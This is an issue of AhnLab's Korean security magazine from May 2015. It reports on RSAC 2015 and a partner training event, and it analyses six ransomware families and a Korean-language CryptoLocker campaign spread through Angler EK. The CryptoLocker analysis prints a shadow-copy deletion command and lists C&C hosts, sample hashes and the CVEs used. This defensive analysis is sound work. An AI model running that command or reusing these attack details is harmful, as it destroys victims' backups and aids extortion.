안랩온라인보안매거진 2015. 05 RSAC 2015 1
월간 2015. 05 CONTENTS 3 Special Report RSAConference 2015 전세계보안기술의경연장, 그곳에 안랩 이있다 8 SpotLight AhnLab Partner Base-up Training Day 2015 파트너와함께상생의봄길을거닐다 12 Hot Issue 1 부 _ 주요랜섬웨어특징과악성행위분석 잔혹한악의화신, 랜섬웨어 Top 6 2 부 _ 크립토락커상세분석정보 한국을강타한랜섬웨어 크립토락커 어떻게공격했나 21 Product Issue AhnLab 내 PC 지키미 기반의통합적인보안지수화모델 핫 (hot) 한 보안지수화 사업모델을찾는다면? 23 Threat Analysis 해외타깃공격에이용된악성코드상세분석 프랑스국영 TV 해킹악성코드, 실체를밝힌다 27 Expert Column 소프트웨어와창의력 31 IT & Life 전문가가전하는보안에대한 오해와진실 메모리해킹수법과예방법 33 AhnLab News 지능형보안위협대응필요하나도입은미진 안랩 V3, AV TEST 글로벌인증획득 34 Statistics 2015년 3월보안통계및이슈 2
Special Report RSAC 2015 안랩, RSA 콘퍼런스 4 년연속참가 전세계보안기술의경연장, 그곳에 안랩 이있다 세계최대보안콘퍼런스인 RSAConference 2015( 이하 RSAC 2015) 가지난 4월 20일 ( 현지시각 ), 미국샌프란시스코모스콘센터 (Moscone Center) 에서개최됐다. CHANGE: Challenge today s security thinking 이라는슬로건을내건이번행사에는전세계 3만 3천여명의보안관계자들과 500여개보안업체들이참가해때로는다양한기술과제품으로치열하게경쟁하고때로는최신동향을공유하는장이었다. 올해로이행사에 4년연속참가한안랩은 APT(Advanced Persistent Threat) 대응솔루션 안랩 MDS PoS 등특수목적시스템전용보안솔루션 안랩 EPS 원스톱스마트폰보안솔루션 V3 Mobile Security( 이하 V3모바일시큐리티 ) 등 APT 대응부터모바일위협까지최신보안동향을관통하는솔루션과기술을소개했다. 특히안랩은 Resolution: Security with Intelligence 라는슬로건과함께고도화 다변화되는최신보안위협에대해기존과는다른관점의대응방안을제시해주목을받았다. 올해도어김없이샌프란시스코거리곳곳의배너가 RSAC 2015와안랩 (AhnLab) 이돌아왔음을알렸다. 행사장인모스콘센터주변을감싸고있는 RSAC 배너는본격적인행사가시작되기전부터행사기간까지총 13일동안전세계보안담당자들의시선을사로잡았다. 3
첫날오프닝행사를제외한실질적인전시기간인 3 일간안랩부스를찾은방문객수는 2 천여명에달한다. 특히 진화하는위협, 진일보한대 응, 위협의확산, PoS 부터 IoT 까지 등의주제로부스에서진행된최신위협동향과대응기술에대한프레젠테이션에이목이집중됐다. 최신보안기술에대한심도있는정보가공유된다는것이 RSAC의가장큰매력이다. 안랩은 30분간의브리핑센터 (Briefing Center) 발표를통해행위기반탐지에의존하는기존의대응방식과달리독자적인동적콘텐트분석 (Dynamic Intelligent Content Analysis, DICA) 기술로악성행위의발생여부와상관없이알려지지않은위협을사전에진단하는방안을소개했다. 특히전상현안랩선임연구원은 DICA를이용해최근지속적으로나타나는문서형악성코드를탐지하는방법을시연해상당한관심을받았다. 4
이미전세계보안전문가들사이에서대표적인 APT 대응솔루션으로알려진 AhnLab MDS 는올해도방문객들의시선을사로잡았다. AhnLab MDS 는알려지지않은 (unknown) 파일을 DICA 등독자적인기술로탐지및분석하며 실행보류 (execution holding) 기능을통해사전에위 협을차단한다. PoS(Point of Sales) 시스템등특수목적의보안솔루션인 AhnLab EPS에대한문의가행사기간내내이어졌다. 미국내에서는지난 2013 년말대형리테일업체해킹사건을비롯해 PoS 시스템보안침해사고가꾸준히발생하면서기존과는다른대응방안을찾아야한다는목소리가높다. AhnLab EPS는허가된프로그램만실행하도록하는화이트리스트기술을기반으로, 백신등을적용하기부적합한 PoS 시스템등에최적화된보안효과를제공한다. 5
글로벌테스트기관 AV TEST 에서 14 회연속인증을획득하는등안랩의모바일보안기술은널리인정받고있다. 안랩은이번행사에서지난 4 월구글플레이스토어를통해출시된 V3 Mobile Security 를선보여악성코드탐지력은물론사생활보호등다양한기능으로방문객들의뜨 거운호응을받았다. 이번행사에서안랩은부스프레젠테이션을비롯해동영상, 백서등다양한형태의콘텐츠로방문객들의오감을만족시켰다. 지난 RSAC 2013 에서 APT 를알기쉽게설명한 APTs for Dummies 를제공한데이어이번행사에서는고도화된익스플로잇공격을심층분석한백서를통해 최신위협동향을공유했다. 6
전세계보안담당자들의곁에는언제나안랩이있다. 반가운안랩의이름은행사장안팎곳곳에서마주칠수있었다. 안랩권치중대표는 나날이교묘한보안위협이증가하고있는가운데안랩의기술과솔루션을세계최대규모의보안콘퍼런스에서선보이게된것을의미있게생각한다 며 앞으로도다양한최신보안위협에효과적으로대응할수있는전략과솔루션을글로벌시장에지속적으로선보이겠다 고밝혔다. 안랩은 RSAC 2015에이어오는 6월미국워싱턴 DC에서개최되는가트너서밋 (Gartner Security & Risk Management Summit) 과베트남, 싱가포르등아시아지역에서진행되는다수의보안행사에참가할예정이다. 이를통해글로벌시장을다각화하는한편각지역의유통채널발굴을통해현지화된글로벌사업을전개하겠다는전략이다. 7
SpotLight AhnLab Partner Base-up Training Day 2015 AhnLab Partner Base-up Training Day 2015 파트너와함께상생의봄길을거닐다 유난히추웠던겨울이었다. 날씨만큼이나경제상황도매서웠다. 그래서더욱기다린봄이었다. 잔뜩물이오른나무의연둣빛새잎이돋 아나고, 막피어나기시작한꽃으로아련한봄풍경이그려진 4 월. 안랩은총판및파트너사의실무자들과함께아슴아슴한백제의향기 가가득한부여로비즈니스여행을떠났다. 안랩파트너베이스업트레이닝데이 2015 현장 ( 左 ) 과고광수안랩채널사업본부상무 ( 右 ) 안랩은지난 4월, 부여롯데리조트에서 안랩파트너베이스업트레이닝데이 (AhnLab Partner Base-up Training Day, 이하베이스업 ) 2015 를개최했다. 베이스업은총판및파트너역량과비즈니스협력강화를위해매년정기적으로진행되는교육워크숍. 올해에는 4월 3~4일, 10 ~11일 2회에걸쳐안랩의네트워크파트너사와소프트웨어파트너사실무자 300여명이참석해, 파트너비즈니스활성화를위한안랩사업전략소개와소통의시간을가졌다. 고광수안랩채널사업본부상무는 2014년한해에도파트너여러분의노력덕분에좋은성과를거둘수있었다 며 이번베이스업은안랩의제품, 파트너정책, 내부프로세스에대해자세히소개하고, 더불어파트너여러분들이안랩에바라는점, 현장에서직접들은고객의생생한목소리를전달해주는자리가되기를바란다 고말했다. 이어고광수상무는파트너와고객의목소리를안랩의정책, 제품에반영하고피드백을느낄수있도록소통을강화하겠다고덧붙였다. 안랩은이번베이스업에서주요전략제품의세일즈시나리오를공유하고이를위한파트너정책과파트너프로그램을소개하는데중점을두었다. V3 및엔드포인트관리제품군, 세이프트랜잭션 (AhnLab Safe Transaction), 트러스가드 (AhnLab TrusGuard), MDS 등안랩의주요전략제품군에대한세일즈포인트소개와네트워크파트너를대상으로는파트너기술지원간담회가함께진행됐다. 8
주요전략제품의세일즈포인트는이것! 오상언안랩제품마케팅팀부장은차세대지능형위협대응솔루션인안랩 MDS를소개했다. 안랩 MDS는 탐지 분석 모니터링 대응 프로세스에기반하여네트워크로유입되는최초위협잠입단계부터 C&C 서버와의통신을통한 2차감염, 전파및내부정보유출과같은최종단계까지 지능형위협의전체라이프사이클 을중심으로위협에대한가시성과실질적인대응체계를제공한다. 오상언부장은 MDS 세일즈를위해서는이제품이왜출시되었는지, 그리고 APT라고불리는지능형위협공격프로세스에대한이해가필요하다 고설명했다. 또한최근지능형위협공격트렌드는데이터유출보다는랜섬웨어와같이하드웨어나 PC 잠금등이더큰이슈가되고있다며, MDS가이를어떻게효과적으로대응할수있는지집중소개했다. 오상언안랩제품마케팅팀부장 특히오상언부장은 기존보안솔루션 vs. APT 대응솔루션 망분리환경에서의 MDS 적용 경쟁사대비차별성 이메일구간에서 APT 솔루션적용등실제고객의궁금증을세일즈 FAQ 형식으로소개해파트너영업대표들로부터큰호응을얻었다. V3 및엔드포인트관리제품군소개에나선이건용안랩제품기획팀과장은 2015년 V3를더욱강력하게만들어줄개선사항과엔드포인트관리제품을통한새로운비즈니스기회에대해집중적으로소개했다. 이건용과장은 지난해베이스업에서는 V3의 Smart( 사전방역 ), Speed( 검사속도 ), Size( 엔진경량화 ) 에대한오해와진실을소개했다. 올해는여러분께 V3의진단율에대한오해와진실을얘기하겠다 며 AV TEST가실시한테스트결과에대해서자세히설명했다. 안랩은글로벌보안제품성능평가기관인 AV TEST가 1, 2월실시한테스트에서진단율 (Protection), 성능 (Performance), 오진및사용편의성 (Usability) 3가지영역의기준을충족해인증을획득했다. 특히, 진단율부문의실제환경에가까운 리얼월드 (real world) 테스트 에서는평균 95%, 기관이선택한대표샘플기반테스트인 프리밸런트 (prevalent) 테스트 에서는평균 100% 의진단율을기록했다. 이어이건용과장은금융위원회고시 전자금융감독규정 에따른가이드로인해현재구체화되고있는보안지수화사업, 개인정보중앙집중화사업등금융권의신규비즈니스기회를어떻게잡을수있는지에대한구체적인방안도제시했다. 안랩제품기획팀이건용과장 ( 左 ) 과김현석과장 ( 右 ) 안랩은새로운기술과기능을제품에구현하는것못지않게고객의요구사항을제품에반영하는데에도노력을다하고있다. 가장대표적인제품이안랩의네트워크통합보안제품인트러스가드이다. 김현석안랩제품기획팀과장은 2015년트러스가드의목표는좀더친절한제품만들기이다. 이를위해현재주요고객과파트너의미팅을진행하고있으며, 이렇게수렴된의견을제품에반영할계획이다. 또한이러한노력은일회성이아니라앞으로도지속될것이다 라고강조했다. 이외에도안랩은트러스가드에 스트림기반안티바이러스 애플리케이션콘트롤탐지시그니처고도화 자사제품과의연동강화등을통해성능과기능측면에서도더욱강력한제품을선보일예정이다. 안랩트러스가드는세계적으로공신력있는시장조사기관인가트너매직쿼드런트 엔터프라이즈네트워크방화벽 부문에국내보안기업으로는유일하게 2년연속등재된제품이다. 9
안랩세이프트랜잭션의세일즈전략을소개중인백민경제품마케팅팀차장 백민경안랩제품마케팅팀차장은온라인서비스환경의보안위협을설명하고, 이에대한해결책으로최근출시한안랩세이프트랜잭션 (AhnLab Safe Transaction) 을소개했다. 백민경차장은 전자금융거래를비롯한인터넷서비스환경을노리는악의적인공격의위험성이증대되고이로인해사용자의보안환경은저해될수밖에없다. 특히관련규정의변경으로기업의자율성과함께책임도증가하는추세이다. 따라서기업들은보안성과편의성을모두충족하는보안솔루션이필요하다 고설명했다. 안랩세이프트랜잭션은차세대해킹방지솔루션으로 온라인키보드보안 악성코드탐지 네트워크보호 콘텐츠위변조방지 메모리보호및해킹방지등의다양한기능을제공한다. 안랩과파트너사실무자들이 1 박 2 일동안공유와소통의시간을가졌다. 10
멀리가기위해함께간다! 안랩베이스업의특징중하나는안랩의제품교육뿐만아니라전국각지에있는파트너사들이모여 1박 2일동안화합과소통의자리를가졌다는것이다. 안랩과파트너담당자가함께조를이뤄참가하는팀빌딩프로그램인안랩퀴즈빙고를통해제품교육에대한이해도를높이고, 서로에대한친밀감을강화했다. 또한아웃도어액티비티프로그램인부소산성과백제문화단지투어도참가자들로부터큰호응을얻었다. 안랩과파트너사실무자들은더욱강력한 파트너십 을바탕으로 2015 년성공적인비즈니스를이끌겠다고다짐했다. 고광수상무는 안랩은 2015년파트너비즈니스를통해질적성장과양적성장을모두이루어낼것이다 라며 이를위해영업효율성, 수익성개선프로그램과프로세스를발굴하고지원할계획이다 라고밝혔다. 또한 이자리에서그치는것이아닌올해내내파트너와고객을찾아가는비즈니스, 그리고그목소리에귀기울이는노력을지속할것이다 라고덧붙였다. 베이스업에참가한파트너사실무자들은안랩전략제품의세일즈포인트에대해이해할수있는유익한자리였다고평가하고, 원활한교류를할수있는다양한프로그램을지속적으로마련해줄것을요청했다. 11
Hot Issue Ransomware 1 부 _ 주요랜섬웨어특징과악성행위분석 잔혹한악의화신, 랜섬웨어 Top 6 국내도랜섬웨어비상이걸렸다. 이미해외에서는수년전부터등장한공격수법이었으나그동안국내에서는큰영향이없었다. 그러나최근랜섬웨어의일종인크립토락커 (CryptoLocker) 의한글버전이국내웹사이트에서유포되면서랜섬웨어에대한우려가높아지고있다. 이글에서는주요랜섬웨어를분류해각각의특징과행위를소개하고자한다. 분류및우선순위는국내외이슈정도 ( 고객사접수, 뉴스기사, 포스팅등 ) 와진단건수를기반으로하였으며, 대상기간은 2014년 10월부터 2015년 3월까지이다. 랜섬웨어 (Ransomware) 는 ransom( 몸값 ) 과 software( 소프트웨어 ) 의합성어로컴퓨터사용자의문서를 인질 로잡고돈을요구한다고해서붙여진명칭이다. 즉, 사용자시스템에설치된후파일을암호화해서정상적으로사용하지못하도록하고이를정상화해준다는조건으로비트코인또는추적이어려운전자화폐를통한금액지급을요구하는악성코드이다. 1 FAMILY Nsb락커 / 나부커 (NsbLocker / Nabucur) MD5 4DDE0233CD956FAA19FF21B3FB73FBBD ED42954A5824A5DD1E579168480191B2 770D3BC32F7ACA8F94DD22209532A352 19840868F8D20089BA4CE289F48A6A09 DC5BAD327EF50D2594F423A1DF7A6C03 FF6CAFE7597BD6FF1521A1A1F817D9BF 랜섬웨어 Top 6 분류및특징랜섬웨어가운데최근 V3 진단수에서큰비중을차지하고기사화등으로이슈가되는것에대해 [ 표 1] 과같이총 6개로분류할수있다. 좀더넓게구분하자면 나부커 (Nabucur) 와그외의랜섬웨어류로나눌수있다. 그차이의기준은나부커는인코딩한원본파일에감염코드를추가해서정상파일을변경하는방식으로 V3에서는해당파 2 Ctb락커 / 크리트로니 (CtbLocker / Critroni) vdefb9614afa1da0d0057c80aacbca7f0 D0C3CE7B8B99D4B4278CE3E3CECE33E9 E89F09FDDED777CEBA6412D55CE9D3BC F420BDEB156FDB2F874A1E5D51E9D65F FEC68D340ED13292701404E438059FB7 14C0558C757C93465ECCBBD77D58BBF3 일들을원본파일로복원할수있다. 반면, 나머지종류의랜섬웨어는 RSA나 AES 같은암호화기법을사용하여원본파일로복원하기위해선복호화키가필요하다. 그리고실제동작을살펴보면비슷한부분이많다는걸알수있다. 3 크립토락커 (CryptoLocker) 0204332754DA5975B6947294B2D64C92 6FE47DC2BDB86B0FC28017FC6A67B1F9v 0E1543914E129FF069D1079695115FE9 0DF492989EEA14562EE2E8C880EEDDB6 419ECEC2051479609ADED0C173619DF8 04FB36199787F2E3E2135611A38321EB 12
4 크립토월 / 크립토디펜스 (CryptoWall / CryptoDefense) 31C2D25D7D0D0A175D4E59D0B3B2EC94 0650C9045814C652C2889D291F85C3AE B6C7943C056ACE5911B95D36FF06E0E4 A9927372ADB1BBAB4D9FEDA4973B99BB 73A9AB2EA9EC4EAF45BCE88AFC7EE87E 랜섬웨어 Top 6 기능분석 Nsb락커 / 나부커나부커악성코드에대해서는 2015년 2월 11일자안랩 ASEC 블로그 (asec.ahnlab.com/1025) 에 원본파일복원이가능한랜섬웨어 (NSB: National Security Bureau) 제목으로소개한바있다. 해당 5 토렌트락커 (TorrentLocker) 7D1D5E27C1C0CB4ABCC56FA5A4A16744 253491AD824E156971C957CD15254844 4A96F22E4FFDBCF271FF4EB70B1320ED 86296FB3DDD46431DDFE8A48D6FB165C 6694617DAB8CD78630AA0A3E002E5197 71C066D831A5749685747B33CB9588A8 악성코드에감염되면시스템에있는이미지파일 (*.bmp, *.gif, *.jpg, *.png), 문서파일 (*.doc, *.ppt, *.xls), 미디어파일 (*.mp3, *.wma) 뿐만아니라실행파일 (*.exe) 과압축파일 (*.rar, *.zip) 도공격대상이된다. 이파일들은원본파일을인코딩된형태로백업하고이는실행파일로변경되는데이와같이원본파일들을 AES, RSA 같은암호화방법으로변경한것이아니기때문에백신으로도복원이가능하다. 그리 6 테슬라크립트 (TeslaCrypt) 01ADE9C90D49AF3204C55D201B466C1B 0FF2BE71B46C129EF8905B41E60C2AB0 03C1A14C715E3A41F36B026A11A1BCB4 0C64ADDB8FE2ED5B029D9337E0E2FBA0 0AFBAEE4802BB74F9AC366579921F2B4 0C27082138728BC2AACE00263396ADDA 고변경된실행파일에는백업된원본파일뿐만아니라나부커감염코드도포함되어있기때문에그자체가다시다른파일들을감염시키는나부커랜섬웨어악성코드가된다. [ 표 1] 주요랜섬웨어분류 각랜섬웨어의특징은 [ 표 2] 와같이정리할수있다. 가장큰특징은앞서언급한것처럼나부커에서는암호화기법을사용하지않았으며공격대상파일에.exe 파일이있다는것이다. 그리고공통적으로모든종류에서비트코인을이용해사용자의결제를유도하는것을확인할수있다. 구분프로토콜암호화주요타깃구현방식결제방식몸값 1 Nsb 락커 / 나부커 TCP Polymorphic Doc/EXE/Image /Media Polymorphic Bitcoin 250 USD [ 그림 2] Nsb 락커 / 나부커동작흐름 2 HTTPS/TOR AES, ECDH Doc/Image OpenSSL Bitcoin 0.5 USD Ctb락커 / 크리트로니 3 크립토락커 HTTP AES, RSA Doc/Image MS Crypto API Bitcoin 300 USD 4 크립토월 / HTTP/TOR RSA Doc/Image MS Crypto API Bitcoin 500 ~ 1000 USD 크립토디펜스 [ 그림 2] 에서볼수있듯이나부커에의해감염된파일이실행되면실행파일 2개를 %User% 와 %ALLUser% 폴더에생성하는데이파일은쓰레드형태로기능을수행하면서 C&C 접속과시스템내의특정확장자를가진파일들을감염시킨다. 그리고최종적으로감염된시스템의화면을금전을요구하는화면으로바꾼다. 5 토렌트 락커 HTTPS AES Doc/Image OpenSSL Bitcoin 0.8 BTC 6 테슬라크립트 HTTPS/TOR AES, ECC Game/Doc/ Image OpenSSL Bitcoin, PayPal 500~1000 USD [ 표 2] 주요랜섬웨어특징 이들랜섬웨어가발생한시기를타임라인으로정리하면 [ 그림 1] 과같다. 최근에발견된 테슬라크립트 (TeslaCrypt) 는공격대상파일을문서나이미지파일뿐만아니라게임관련파일들도대상에포함된것이특징이며, 이메일로유포되는 Ctb락커(CtbLocker) 류는최근에다시확산되고있다. [ 그림 1] 주요랜섬웨어타임라인 [ 그림 3] Nsb 락커 / 나부커감염화면 Ctb락커 / 크리트로니 2014년 7월에공개된랜섬웨어 Ctb락커 (CtbLocker) 는 크리트로니 (Critroni) 라는이름으로도알려졌으며스팸메일로유포되는다운로더에의해서생성및실행된다. 첨부파일에포함되어있는다운로더는.zip 또는.cab 형태로압축되어유포된다. 압축해제된파일은.scr 확장자를가지고있다. 실행을하면 %TEMP% 폴더에정상.rtf 파일을생성 / 실행해서마치문서파일처럼위장하지만백그라운드에서는사용자몰래악성코드를다운로드한다. 13
이랜섬웨어는자신을레지스트리에자동실행하도록등록해놓는데등록된이름이 크립토락커 (CryptoLocker) 로되어있는것이특징이다. C&C서버에접속해서공개키 (Public Key) 를받아온후에시스템의파일들을암호화하는데현재는해당서버들이다운되어있는상태이므로랜섬웨어기능이동작하지는않는다. [ 그림 4] Ctb 락커 / 크리트로니동작흐름 다운로드된파일은랜섬웨어악성코드로오피스문서파일들뿐만아니라이미지와소스파일그리고기타파일들을암호화대상으로하고완료후에는 Ctb락커에대한메시지와함께비트코인을요구하는페이지를화면에보여준다. [ 그림 7] 크립토락커동작흐름 [ 그림 5] Ctb 락커감염화면 2014년 8월, 글로벌보안전문가들이 Tovar 오퍼레이션을통해이악성코드제작자의 C&C 서버를다운시키고서버에저장된복호화키를다수획득함으로써현재는암호화된파일상당수를이전의상태로복구할수있게되었다. 해당기간까지전세계약 50만대의시스템이크립토락커에감염된것으로보고되었다. 96 시간내에돈을지급하지않으면데이터를복구할수없다는메시지 를보여주고해당시간이모두지나거나컴퓨터시간을임의로이후시 간으로조작하면 [ 그림 6] 과같이만료 (expire) 화면이나타난다. [ 그림 6] Ctb 락커만료화면 크립토락커 2013년 9월에최초발견된크립토락커 (CryptoLocker) 는 Ctb락커와마찬가지로스팸메일의첨부파일형태또는 P2P 방식의 게임오버제우스 (Gameover Zeus) 봇넷악성코드를통해서유포되며문서와이미지파일들을암호화하였다. 이를정상화하고싶으면머니팩 (MoneyPak) 이나비트코인을통한결제를요구한다. [ 그림 8] 크립토락커감염화면 크립토월 / 크립토디펜스크립토월은전체적인동작흐름이앞서설명한크립토락커와비슷하다. 둘다하위프로세스를생성한후 PE 이미지를인젝션시켜서동작하며, C&C 서버로부터공개키를받아온후랜섬웨어기능을실행한다. 14
[ 그림 12] 토렌트락커감염화면 [ 그림 9] 크립토월동작흐름 테슬라크립트테슬라크립트 (TeslaCrypt) 는게임기능과저장데이터를공격하는랜섬웨어류로, 아이프레임 (iframe) 대신태그 (div) 를이용한플래시플레이어취약점을통해일반사용자 PC에설치된다. 구조는크립토락커 (CyptoLocker) 와유사하지만문서파일뿐만아니라게임관련파일 ( 프로필, 세이브, 데이터, 지도, 모드등 ) 도암호화한다는차이가있다. [ 그림 10] 크립토월감염화면 토렌트락커토렌트락커 (TorrentLocker) 역시앞에설명한크립토락커, 크립토월과비슷한동작을하며코드가진행되는부분도매우비슷하다. 단 HKCU\Software\Bit Torrent Application\configuration 레지스트리에암호화한파일리스트를등록하는특징이있어서토렌트락커 (TorrentLocker) 라고명명하게되었다고한다. [ 그림 13] 테슬라크립트동작흐름 [ 그림 11] 토렌트락커동작흐름 테슬라크립트는크립토락커와는다르게네트워크접속은사용자 PC 의비트코인접속주소를전달하기위해사용되며, %AppData% 폴더에는암호화한파일리스트를가지고있는 log.html 파일과복호화할때사용하는 key.dat 파일이저장된다. 그리고바탕화면에생성되는 HELP_RESTORE_FILES.txt 파일에는암호화된파일을풀기위해비트코인을지급하는과정이설명되어있다. 15
[ 그림 14] 테슬라크립트감염화면 랜섬웨어악성코드에사용자 PC가감염되면, 화면으로 PC가감염되었음을사용자에게알려주고이를정상화하려면돈을지급하라는내용에사용자들은혼란을겪는다. 당장 PC를사용할수없을뿐만아니라내부에중요한파일들이있다면다른뚜렷한해결책이없는상황에서는사용자들이결제를선택할수밖에없을것이다. 그렇다고실제돈을지급했을때시스템이원래대로돌아온다고확신할수도없다. 그렇기때문에해당악성코드에 PC가감염되는것을애초에방지하는것이가장좋은방법인데그러기위해서는발신자가명확하지않은이메일에포함된의심스러운파일들을실행하지말아야한다. 또한 PC에사용중인백신을항상최신의상태로업데이트하고, OS와애플리케이션공급업체에서제공하는패치를최신버전으로유지하는것이중요하다. 16
Hot Issue Ransomware 2 부 _ 크립토락커상세분석정보 한국을강타한랜섬웨어 크립토락커 어떻게공격했나 최근국내유명인터넷커뮤니티사이트를통해랜섬웨어의일종인크립토락커가유포되었다. 그동안국내에서발견된랜섬웨어와는 달리한글로되어있으며, 한국의인터넷커뮤니티에서유포된점을보아한국의사용자를표적으로했음을알수있다. 이글에서는 최근이슈가된한글로된 크립토락커 에대한상세분석정보를소개하고자한다. 최근에발견된크립토락커 (CryptoLocker) 는 [ 그림 1] 에서확인할수있듯이지난 2013년 9월에처음발견되었다. 이외에크립토월 (CryptoWall), 토렌트락커 (TorrentLocker), 크립토그래픽락커 (CryptographicLocker), 테슬라크립트 (TeslaCrypt) 등의랜섬웨어도지속적으로나타났다. 주로이메일을통해유포되던랜섬웨어악성코드가최근국내인터넷커뮤니티사이트를이용해유포되었고해당랜섬웨어인크립토락커도과거의그것들과같은류이다. 방법을상세하게설명하고있으며실제복원이가능함을증명하기위해암호화된파일중 1개의파일을무료로복호화해준다. 이를통해악성코드제작자는중요한파일을암호화하여사용자에게금전을유도하고있다. [ 그림 1] 주요랜섬웨어타임라인 최근이슈가된한글크립토락커에감염되면 [ 그림 2] 와같은화면이나타나며, 암호화된파일들을복원하기위해한화약 438,900원의비트코인을요구한다. 피해자들이쉽게비용을지급할수있도록결제 [ 그림 2] 크립토락커감염화면 17
그리고사용자 PC의 IP 대역을확인해서해당국가에맞는언어의안내페이지를생성및실행하여보여준다. 결제를진행하기위해안내된링크를클릭하면아래와같은정보가기본으로세팅되어있는데, Tor( 익명의분산형네트워크 ) 를사용해서네트워크추적을어렵게해놓았다. 자동화된웹공격툴킷 Angler EK 크립토락커에감염되면사용자는최종적으로난독화된 Angler EK 의취약점랜딩페이지로연결된다. ( 예 ) http://zoqowm4kzz4cvvvl.torlocator.org/jxt85f9.php - User-Code: 12lrne9 - User-Pass: 8394 감염경로이번에국내에유포된크립토락커는사용자시스템의취약점을이용한전형적인웹기반의 DBD(Drive-By-Download) 방식을통해감염이이루어졌다. 국내에서많은사용자들을보유한유명커뮤니티사이트에접속하면취약한사이트로리다이렉션 (Redirection) 되면서특정취약점에의해랜섬웨어악성코드가다운로드되고실행되었다. [ 그림 5] Angler EK 동작구조 이때악성코드의탐지우회기능과유사하게, 스크립트레벨에서도취약점 CVE-2013-7331 을이용하여가상환경, 분석환경, 백신프로그램등의클라이언트환경을체크한다. 만약, 해당프로그램들이존재하는경우, 공격이정상적으로이루어지지않는다. 또한, [ 표 1] 과같이특유의변수를이용하여개별애플리케이션들의공격여부를제어한다. 애플리케이션 어도비플래시플레이어 변수 window.sf325gtgs7sfdf1 window.sf325gtgs7sfdf2 [ 그림 3] 감염경로 MS 실버라이트 window.sf325gtgs7sfds 최초유포지및경유지이번랜섬웨어악성코드배포에는국내 3곳의대표적인 IT 커뮤니티가악용되었다. (1) C업체 (2) S업체 (3) R업체이들국내사이트에는광고데이터를동적으로받아서화면에보여주는기능이포함되어있다. 공격자는이기능을악용하여, [ 그림 4] 와같이광고서버에악의적인스크립트를삽입하거나직접사이트를변조하는방법으로사용자들이인지하지못한채악의적인사이트로연결되도록유도하였다. 오라클자바 window.sf325gtgs7sfdj 환경체크 window.sf325gtgs7sfdfn [ 표 1] 애플리케이션제어변수 취약점및페이로드 ( 셸코드 ) 일반적인 Angler EK는다양한애플리케이션취약점을이용하는것으로알려졌으나, 이번공격에는 갓모드 (God Mode) 로알려진 CVE- 2014-6332 와어도비의플래시플레이어취약점인 CVE-2014-0515 취약점이이용되었다. [ 표 2] CVE-2014-6332 취약점 [ 그림 4] C 업체에삽입된악성스크립트 [ 표 3] CVE-2014-0515 취약점발생부분 특히, 삽입된악성스크립트들은경유지사이트를거쳐, 최종적으로취약점공격코드가탑재된사이트로연결된다. 이때사용자클라이언트시스템상의취약점을이용하기위해자동화된웹공격툴킷인 Angler EK 가사용되었다. 이들취약점을이용해셸코드실행시, 공격자사이트로부터추가적인페이로드 (Payload) 를다운로드받는다. 이를해당키 (KEY) 문자열로해제한후, 페이로드의시작이 9090 또는 MZ 인지구별하여직접메모리상에서실행하거나 tmp 파일 (%temp% 폴더 ) 로생성하여실행한다. 18
기능분석전체동작흐름이번랜섬웨어가실행되면다른악성코드처럼자기자신을 %WINDOWS% 폴더에복사해놓고 HKCU\Software\ Microsoft\Windows\CurrentVersion\Run\< 랜덤명 > 에등록한다. 해당키에실행파일을등록해놓으면시스템을재부팅할때마다자동으로실행되는데, 이렇게되면해당파일을찾아서삭제하지않는다면감염된 PC의사용자가금액을지급하고파일을복구했다하더라도재감염될가능성이크다. 자신을자동실행되게등록한후에는정상 explorer.exe 프로세스를생성하고 C&C 서버통신및파일을암호화하는주요기능을포함한 PE 파일을인젝션시켜서동작한다. 볼륨섀도카피삭제아래명령을실행해서볼륨섀도카피를삭제하는데이렇게되면윈도운영체제에서제공하는파일백업및복원기능을정상적으로사용할수없다. 이명령은크립토락커류에서공통적으로확인할수있는기능이다. - vssadmin.exe Delete Shadows /All /Quiet 파일암호화랜섬웨어의가장특징적인기능은사용자의중요파일들을암호화하는것이다. 아래에리스트되어있는확장자를가진파일과폴더는대상에서제외된다. 그리고 이동식드라이브 와 네트워크드라이브 에있는파일도암호화대상이되며암호화가완료된파일에는확장자뒤에.encrypted 문자열이붙는다. [ 제외대상확장자 ].avi,.wav,.mp3,.gif,.ico,.png,.bmp,.txt,.html,.inf,.manifest,.chm,.ini,.tmp,.log,.url,.lnk,.cmd,.bat,.scr,.msi,.sys,.dll,.exe [ 그림 6] 크립토락커동작흐름 네트워크접속네트워크통신상태를확인하기위해 www.download. windowsupdate.comm 과 akamaitechnologies.com 에접속한다. 이후 C&C 서버인 https://lepodick.ru/topic.php 에두번에걸쳐 POST 패킷을전송하는데첫번째는사용자 PC의정보를전달한후 IP 대역에따른 ( 나라별 ).txt 와.html 파일을받아온다. 그리고두번째에는앞에서보낸정보에암호화된파일들을복호화할때필요한키정보 (256byte) 를함께보내고서버에서 200 OK 응답을받으면파일들을암호화하기시작한다. 서버로부터받은 DECRYPT_ INSTRUCTIONS.txt 와 DECRYPT_INSTRUCTIONS.html 파일은암호화한파일이있는모든폴더에생성되며, 시스템이감염되었다는메시지를사용자에게보여주고파일을정상적으로복원하기위해비트코인을사용한결제방법이설명되어있다. [ 제외대상폴더 ] - %Program Files% - %ProgramW6432% - C:\WINDOWS - C:\Documents and Settings\All Users\Application Data - C:\Documents and Settings\ 사용자계정 \Application Data - C:\Documents and Settings\ 사용자계정 \Local Settings\ Application Data - C:\Documents and Settings\ 사용자계정 \Cookies - C:\Documents and Settings\ 사용자계정 \Local Settings\ History - C:\Documents and Settings\ 사용자계정 \Local Settings\ Temporary Internet Files 앞에서리스트되어있던암호화대상제외확장자및폴더를제외하고는파일외형적으로는 [ 그림 8] 처럼파일의확장자에.encrypted 가추가된것을확인할수있다. 이렇게암호화된파일내부에는변경된원본데이터와시그니처그리고복호화에필요한 256바이트공개키가포함되어있다. [ 그림 7] C&C 통신과정 [ 그림 8] 감염전 / 후의변경된파일명 19
